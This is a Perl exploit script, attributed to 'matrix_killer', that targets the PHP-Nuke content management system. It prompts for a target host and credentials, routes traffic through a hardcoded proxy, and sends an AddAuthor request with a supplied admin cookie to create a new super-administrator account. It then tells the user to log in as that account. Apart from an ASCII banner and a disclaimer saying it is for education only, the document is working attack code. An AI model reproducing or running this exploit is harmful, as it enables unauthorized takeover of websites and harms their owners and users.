#!/usr/bin/perl use LWP::UserAgent; ############################################################################################################ # # # # # \ | # # + \ | # # |\ /| || ||||||||||||||||||| |||||| | \ | # # | \ / | | | | | | | | | \ | # # | \ / | | | | | | | \ | # # | \ / | | | | | | | \ | # # | \ / | | | | | | | \ | # # | \ / | | | | | | | || # # | \ / | | | | | | | | \ # # | \ / | | | | |||||||||||| | | \ # # | \ / | |||||||||| | |\\ | | \ # # | \ / | | | | | \\ | | \ # # | \ / | | | | | \\ | | \ # # | \ / | | | | | \\ | | \ # # | \ / | | | | | \\ | | \ # # | \/ | | | | | \\ | | \ # # # ############################################################################################################ print "========================================\n"; print " PHP-NUKE all versions add admin exploit\n"; print " Exploit coded by matrix_killer\n"; print " Greetz to all omega-team members\n"; print " See the sourece for more information\n"; print "========================================\n"; print "Enter host: "; #example:www.host.org my $host=; chomp ($host); print "Enter username: "; #example:Lamer my $user=; chomp ($user); print "Enter pass: "; #example:lamer my $pass=; chomp ($pass); print "Enter base64 username and md5 hash: "; my $base64=; chomp ($base64); my $ua = new LWP::UserAgent; $ua->proxy(['http'] => 'http://192.168.166.167:6588'); #setup here the proxy and the port #Change the base64 text to the base 64 username and password my $xpl="http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=hacked@rooted.com&add_radminsuper=1&admin=$base64"; my $res = $ua->request(new HTTP::Request POST => $xpl); print "DONE !!! Now go to $host/admin.php and login as $user for username and $pass for password\n"; #For questions send me a e-mail to matrix_k@abv.bg #I'm not responsible for the damage that you will make with this exploit.The exploit is wrighten for education purposes only !